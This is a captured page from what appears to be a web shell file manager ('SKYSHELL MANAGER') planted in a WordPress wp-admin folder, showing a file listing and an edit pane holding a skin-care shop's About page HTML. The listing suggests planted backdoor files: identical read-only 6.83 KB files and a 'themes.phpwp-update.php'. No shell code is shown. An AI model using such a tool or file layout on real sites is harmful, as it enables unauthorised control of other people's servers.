📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: about-us.php
<!DOCTYPE html> <html lang="en"> <head> <title>EstoreNexus Shop - about Us</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Best treatment For different skin types"> <meta name="keywords" content="Skin shop,Best Skin shop"> <link rel="shortcut icon" href="images/favv.png" type="image/x-icon"> <!-- <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />--> <link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/camera.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/style.css" type="text/css" media="screen"> <link href='http://fonts.googleapis.com/css?family=Parisienne|Raleway:400,300' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700' rel='stylesheet' type='text/css'> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/superfish.js"></script> <script type="text/javascript" src="js/jquery.easing.1.3.js"></script> <script type="text/javascript" src="js/camera.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> <script type="text/javascript" src="js/jcarousel.js"></script> <script> jQuery(document).ready(function(){ jQuery('.camera_wrap').camera(); jQuery('.social img').animate({'opacity':'.85'},10); jQuery('.social img').hover( function () { jQuery(this).animate({'opacity':'1'},150); }, function () { jQuery(this).animate({'opacity':'.85'},250); } ); // Responsive layout, resizing the items $('.carousel.main ul').carouFredSel({ auto: 4000, responsive: true, width: '100%', scroll: 1, prev: '#prev', next: '#next', pagination: false, mousewheel: false, swipe: { onMouse: true, onTouch: true }, items: { width:380, height: 'auto', // optionally resize item-height visible: { min: 2, max: 3 } } }); }); </script> <!--[if lt IE 8]> <div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/images/upgrade.jpg"border="0"alt=""/></a></div> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <script type="text/javascript" src="js/jquery.mobile.customized.min.js"></script> <!--<![endif]--> <!--[if lt IE 9]> <link href='http://fonts.googleapis.com/css?family=Open+Sans:400' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:600' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"> <![endif]--> </head> <body> <div id="main"> <!-- <div class="container top"> <div class="row"> <div class="span12"> <div class="clearfix"> <div class="social"> <a href="#"><img src="images/social_1.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_2.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_3.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_4.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_5.png" alt="" width="29" height="30" border="0" /></a> </div> <!--==============================Search========================= <form id="search-form" action="search.php" method="GET" accept-charset="utf-8" class="navbar-form" > <input type="text" name="s" value='Search' onBlur="if(this.value=='') this.value='Search'" onFocus="if(this.value =='Search' ) this.value=''" > <a href="#" onClick="document.getElementById('search-form').submit()"></a> </form> </div> </div> </div> </div>--> <div id="inner" style="margin-top:20px;"> <!--==============================Header=================================--> <header> <div class="container"> <div class="row"> <div class="span5"> <div class="clearfix"> <div class="clearfix header-block-pad"> <a href="index.php"><img src="images/estore.png" alt=""></a> </div> </div> </div> <div class="span7"> <p class="phone"> Have questions? <span>Call: +414-289-9997</span> </p> </div> </div> </div> <!--==============================Nav=================================--> <div id="nav_section"> <div class="container"> <div class="row"> <div class="span12"> <div class="navbar navbar_ clearfix"> <div class="navbar-inner navbar-inner_"> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse_">MENU</a> <div class="nav-collapse nav-collapse_ collapse"> <ul class="nav sf-menu"> <li> <a href="index.php"> Home </a> </li> <li class="active"> <a href="about-us.php"> About us </a> </li> <li> <a href="services.php"> Services </a> </li> <li > <a href="therapies.php"> Therapies </a> </li> <li> <a href="treatments.php"> Treatments </a> </li> <li > <a href="contact_us.php"> Contact Us </a> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> <!--==============================End Nav=================================--> <!--==============================Slider=================================--> <div class="slider"> <div class="camera_wrap span12"> <div data-src="images/image1.webp"> <div class="camera_caption"> </div> </div> <div data-src="images/image2.jpg"> <div class="camera_caption"> </div> </div> <div data-src="images/slider_3.jpg"> <div class="camera_caption"> </div> </div> <div data-src="images/slider_4.jpg"> <div class="camera_caption"> </div> </div> </div> </div> </header> <!--==============================Carusel=================================--> <div class="carousel-box"> <div class="inner span12"> <div class="carousel main" > <ul > <li > <a> <small>1</small> <h4>Skin Care</h4> <p> Healthy skin starts with a commitment to a regular skin care regimen, using high quality skin care and facial products every day. While we often think of the face first when it comes to caring for the skin, the skin on the body also needs attention. </p> </a> </li> <li > <a> <small>2</small> <h4>Make Up</h4> <p> Away from your everyday makeup favorites like foundations, lip color, blushes and eye shadows, our collection of cosmetics also includes eyelash and eyebrow enhancers, mineral concealers </p> </a> </li> <li > <a> <small>3</small> <h4>Hair Care</h4> <p> Even though we're best known for our skin care, we carry a variety of hair products including shampoos, conditioners, styling products, styling tools and special treatments. </p> </a> </li> <li > <a> <small>4</small> <h4>Bath & Body</h4> <p> Let our range of body products inspire you to pamper yourself from top to toe, whilst looking after your body. With our extensive range of skin loving products, from moisturizers and bath oil </p> </a> </li> </ul> <a id="prev" href="javascript:;" style="display: block;" class=""></a> <a id="next" href="javascript:;" style="display: block;" class=""></a> </div> </div> </div> <!--==============================Content=================================--> <section id="content" > <div class="container"> <div class="row "> <div class="clearfix "> <div class="span12"> <h2>About Us</h2> <img src="images/about.png" title="" alt="" style="float:left;width:20%;margin-right:3%;"> <p style="float:right;margin-left:25px;"> <p> Our EstoreNexus Shop first opened its doors almost 2 years ago and has now established itself as US No. 1 provider of Skin Shop Our skin shop has carved a niche, creating an exceptionally strong, recognized brand through the supply of affordable, accessible and most up to date Laser and Aesthetic treatments available globally. Trust is one of our core values and our aim is to empower our clients, women and men, to become the best possible version of themselves. We want to not just meet your expectations, but to exceed them. At live skin shop, we believe that true beauty comes from within; a result of being healthy and confident; taking the time to nurture your body, your skin, yourself. We take an integrated approach to beauty, helping our clients discover the best version of themselves. <h5><b>“At our live skin shop, we want to inspire you to look good, to feel good, and get the best out of life.”</b></h5> <p>Your holistic session begins with a thorough consultation where we talk about stress, skin conditions and nutrition. You will be offered a variety of holistic facials and body treatments to relax and rejuvenate. We offer everything from Reiki, Holistic European Facials, Anti-Aging Facials, Teen Acne Facials and Customized Sessions which combines Facial treatments with Energy Healing or Body Treatments. The men in your life will also enjoy a relaxing Beard Conditioning Treatment and Men's Cleanse. </p> <h5 style="margin-top:5%"><b>Here are a few of the things you can do:</b></h5> <p class="bold">Find solutions quickly. With an enhanced search and browse, you can easily find exactly what you’re looking for.</p> <p class="bold">Learn how to do almost anything. Follow step-by-step instructions on how to braid hair, how to make a martini, how to chop parsley, and more.</p> <p class="bold">Keep track of your to-dos. Planning a party? Packing for a move? Use one of 100+ interactive checklists that will keep you on track.</p> <p class="bold">Get daily solutions via e-mail. Sign up for free newsletters and get tips and solutions sent straight to your in-box, from inspiring Daily Thoughts to quick and easy.</p> </ul> <p>We know that how you look plays a significant part in your day to day life and we will always respect that. We are always on the lookout for innovative new brands and products to provide you with confidence to tackle the day ahead. We have a dedicated team who spend time building relationships with our brands which means we will always provide you with the best advice possible. We are passionate about delivering excellence and setting high benchmarks in everything we do. We love the products that we sell and we work together as a team to make a difference. </p> <div class="padcontent"></div> </div> </div> </div> </div> </section> <!-- {% Footer %} --> <div class="bg_center_footer"> <div class="container"> <div class="row"> <div class="span3 footer-logo"> </div> <div class="span9"> <ul> <li> <a href="privacy-policy.php"> Privacy Policy </a> </li> <li> <a href="termsandconditions.php"> Terms and Conditions </a> </li> <li> <a href="subscribe.php"> Subscribe </a> </li> <li> <a href="unsubscribe.php"> Unsubscribe </a> </li> </ul> </div> </div> </div> </div> <!-- {% Copyright %} --> <div class="copyright"> <div class="container"> <div class="row"> <div class="span12" style="text-align:center"> <a href="http://www.estorenexusshop.com">EstoreNexus Shop</a> © 2024. All rights reserved. </div> </div> </div> </div> </div><!-- inner --> </div><!-- main --> <script type="text/javascript" src="js/bootstrap.js"></script> </body> </html>
Save